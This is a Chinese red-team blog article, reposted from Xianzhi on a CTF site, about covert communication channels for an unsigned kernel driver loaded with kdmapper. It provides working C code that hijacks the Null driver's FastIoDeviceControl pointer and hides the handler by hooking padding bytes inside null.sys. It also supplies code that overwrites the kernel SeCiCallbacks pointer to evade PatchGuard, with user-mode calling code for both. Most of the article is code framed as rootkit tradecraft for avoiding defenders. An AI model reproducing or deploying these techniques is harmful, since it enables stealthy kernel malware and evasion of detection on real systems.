高级红队之驱动通信隐藏技术

渗透技巧 1年前 (2023) admin
87 0 0

前言:

上一章简单说了驱动在无签名时如何进行加载,但我们加载后还需要与三环建立通信。如果我们使用IO进行通信,在使用mapper加载后会蓝屏且很容易被发现。所以我们需要一些其他的手段进行通信:

  1. 劫持通信
  2. .data ptr技术

劫持通信:

可以直接通过字面意思来理解,就是劫持已经加载的驱动的通信来和我们进行通信。通常这个通信会选择Windows自带的驱动。我们可以使用火绒剑来看驱动的IO:

这个是驱动对象:

高级红队之驱动通信隐藏技术

这个是设备对象:

高级红队之驱动通信隐藏技术

这个是通信会得派遣函数:

高级红队之驱动通信隐藏技术

如何知道这个驱动能否被劫持呢?这里就需要用到火绒剑他得派遣函数了:

如果说这两个被指定了,那我们就尽量不要去劫持了:

高级红队之驱动通信隐藏技术

高级红队之驱动通信隐藏技术

因为如果这两个有的话你再去劫持,会使原本的驱动通信失效,导致操作系统出现种种问题。这里给出一个可以劫持的案例:

高级红队之驱动通信隐藏技术

这样的话我们去修改fastio就是改的堆内存的一个地址,且目标没有指定fastio也不会存在错误通信导致的蓝屏问题

代码编写:

BOOLEAN DeviceIoControl(
    _In_ struct _FILE_OBJECT* FileObject,
    _In_ BOOLEAN Wait,
    _In_opt_ PVOID InputBuffer,
    _In_ ULONG InputBufferLength,
    _Out_opt_ PVOID OutputBuffer,
    _In_ ULONG OutputBufferLength,
    _In_ ULONG IoControlCode,
    _Out_ PIO_STATUS_BLOCK IoStatus,
    _In_ struct _DEVICE_OBJECT* DeviceObject
)
{
    if (MmIsAddressValid(InputBuffer) && MmIsAddressValid((PUCHAR)InputBuffer + InputBufferLength - 1))
    {
        Comm* mem = (Comm*)InputBuffer;
        if (mem->cmd == 0x12345678)
        {

            KdPrint(("OK Comm!\r\n"));

            IoStatus->Information = 0;
            IoStatus->Status = STATUS_SUCCESS;

        }
    }
    //DbgBreakPoint();
    return TRUE;
}

NTSTATUS RegisterComm() {

    UNICODE_STRING deviceName = { 0 };

    RtlInitUnicodeString(&deviceName, L"\\Device\\Null"); //设备名称
    PDEVICE_OBJECT pDevice = NULL;
    PFILE_OBJECT fileObject = NULL;
    NTSTATUS status = IoGetDeviceObjectPointer(&deviceName,FILE_ALL_ACCESS,&fileObject,&pDevice); //根据设备名获取到设备对象
    if (!NT_SUCCESS(status))
    {
        return status;
    }

    if (fileObject!=NULL)
    {
        ObDereferenceObject(fileObject); //取消引用
    }

    PDRIVER_OBJECT pDriver = pDevice->DriverObject;


    pDriver->FastIoDispatch->FastIoDeviceControl = DeviceIoControl; //指定派遣函数
    return STATUS_SUCCESS;
}

R3通信代码:

HANDLE hDevice = CreateFileA("\\??\\Nul", FILE_GENERIC_WRITE | FILE_GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    Comm comm = { 0 };
    comm.cmd = 0x12345678;
    comm.id = 111;
    DWORD retLen = 0;
    DeviceIoControl(hDevice, 0, &comm, sizeof(comm), &comm, sizeof(comm), &retLen, NULL);

kdmapper加载成功:

高级红队之驱动通信隐藏技术

查看火绒中的fastIo:

高级红队之驱动通信隐藏技术

可以发现已经成功注册了,但是存在一个问题就是这个地址因为我们驱动隐藏的原因成了一个无模块的地址。如果蓝队仔细查看的话还是会看出端倪,R3通信:

高级红队之驱动通信隐藏技术

这样就成功劫持了系统驱动的IO进行通信,隐藏了通信:

高级红队之驱动通信隐藏技术

接下来就是处理这个模块,思路如下:

  1. 找到Null驱动中空白字节
  2. 修改内存属性为PAGE_EXCUTE_READWIRTE
  3. HOOK该地址跳转到我们的函数

代码如下:

ULONG64 hookPtr = searchCode("null.sys", ".text", "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC", 0);


    status = hook_by_addr(hookPtr, DeviceIoControl,&num);

    if (!NT_SUCCESS(status))
    {
        return status;
    }

    KdPrint(("hook Ptr = %p\r\n", hookPtr));
    pDriver->FastIoDispatch->FastIoDeviceControl = hookPtr; //指定派遣函数

这样再去看派遣就变成Null.sys内部的地址了:

高级红队之驱动通信隐藏技术

.data ptr 通信技术

什么是.data ptr?我们知道在3环下调用函数流程如下:

  1. OpenProcess
  2. NtOpenProcess(ZwOpenProcess)
  3. syscall
  4. kernel NtOpenProcess

那么我们在kernel中找到一个函数,hook他就可以达到通信的效果。但是现阶段微软引入了PG导致我们不能够HOOK系统中的函数,那么我们就需要换一种思路

  1. 找到三环syscall零环的函数
  2. 查看该函数是否有调用指针函数
  3. 修改指针

这样来进行HOOK,我们修改的是指针而不是代码段。有部分指针微软并没有检测,我们只需要找到该指针就可以了。示例:

NtSetInformationProcess函数中有这么一段代码:

高级红队之驱动通信隐藏技术

当a2 == 90的时候会调用SeCodeIntegritySetInformationProcess

高级红队之驱动通信隐藏技术

这个函数中调用了指针函数,那么我们只需要修改这个指针的值就可以实现在三环下调用NtSetInformationProcess来和零环进行通信了:

ULONG_PTR func = searchCode("ntoskrnl.exe", "PAGE", "458bf1498bf0448bfa4c8be148833d*****75*b8BB0000C0eb6541b853652020", 0);
    if (func)
    {
        DWORD32 offset = *(DWORD32*)(func + 15);
        PULONG64 SeCiCallbacks = ((func + 15 + 5) & 0xFFFFFFFF00000000) + ((func + 15 + 5 + offset) & 0xFFFFFFFF);
        gWin10HookPoint = SeCiCallbacks;
        gOldSeCiCallbacksWin10 = SeCiCallbacks[0];
        SeCiCallbacks[0] = fnSeCiCallbacksWin10;
    }

    return STATUS_SUCCESS;

通信函数:

ULONG64 fnSeCiCallbacksWin10(ULONG64 info, DWORD32 un2, ULONG64 un3, DWORD32 un4) {

    if (MmIsAddressValid(info))
    {

        CommPackage* package = (CommPackage*)info;

        if (package->Id == 0x12345678)
        {
            KdPrint(("OK Comm! id:%d\r\n", package->id));
        }
        else
        {
            if (gOldSeCiCallbacksWin10)
            {
                return gOldSeCiCallbacksWin10(info, un2, un3, un4);
            }

        }


    }

    return STATUS_SUCCESS;


}

三环调用:

void main() {


    NtSetInformationProcess fnNtSetCachedSigningLevel = (NtSetInformationProcess)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSetInformationProcess");
    Comm cp;
    cp.id = 0x9;
    cp.cmd = 0x12345678;

    fnNtSetCachedSigningLevel((ULONG64)&cp, 90, (ULONG64)&cp, sizeof(cp));

}

通信成功:

高级红队之驱动通信隐藏技术

前文:

https://xz.aliyun.com/t/12965

原文始发于先知社区(小透明yo):高级红队之驱动通信隐藏技术

版权声明:admin 发表于 2023年11月11日 上午11:36。
转载请注明:高级红队之驱动通信隐藏技术 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...